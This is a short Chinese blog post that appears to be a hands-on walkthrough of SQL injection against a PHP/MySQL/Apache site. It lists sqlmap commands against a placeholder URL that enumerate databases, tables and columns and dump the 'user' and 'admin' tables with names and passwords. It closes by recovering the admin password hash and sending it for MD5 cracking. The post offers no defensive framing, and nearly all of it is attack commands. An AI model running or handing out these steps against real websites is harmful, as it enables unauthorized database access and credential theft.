实战:某网站的SQL注入(php+mysql+Apache)
实战:某网站的SQL注入(php+mysql+Apache)–>
1.列出所有数据库
sqlmap -u “http://www.aaa.com/a.php?id=2” –dbs
2.列出数据库”hailc0218″的所有表
sqlmap -u “http://www.aaa.com/a.php?id=2” –tables -D”hailc0218″
3.列出数据库”hailc0218″表“user”的所有字段
sqlmap -u “http://www.aaa/a.php?id=2” –columns -T”user” -D”hailc0218″
4.列出数据库”hailc0218″表“user”的前20个“id”,“name”和“password”的数据
sqlmap -u “http://www.aaa.com/a.php?id=2” –dump -C”password,name,id” -T”user” -D”hailc0218″ –start 1 –stop 20
5.列出数据库”hailc0218″表“admin”的所有字段
sqlmap -u “http://www.aaa.com/a.php?id=2” –columns -T”admin” -D”hailc0218″
6.列出数据库”hailc0218″表“admin”的所有数据
sqlmap -u “http://www.aaa.com/a.php?id=2” –dump -T”admin” -D”hailc0218″
7.发现admin账号的密码为0059xxxxxxxxxxxxxxx
拿去MD5解密
本文来源 互联网收集,文章内容系作者个人观点,不代表 本站 对观点赞同或支持。如需转载,请注明文章来源,如您发现有涉嫌抄袭侵权的内容,请联系本站核实处理。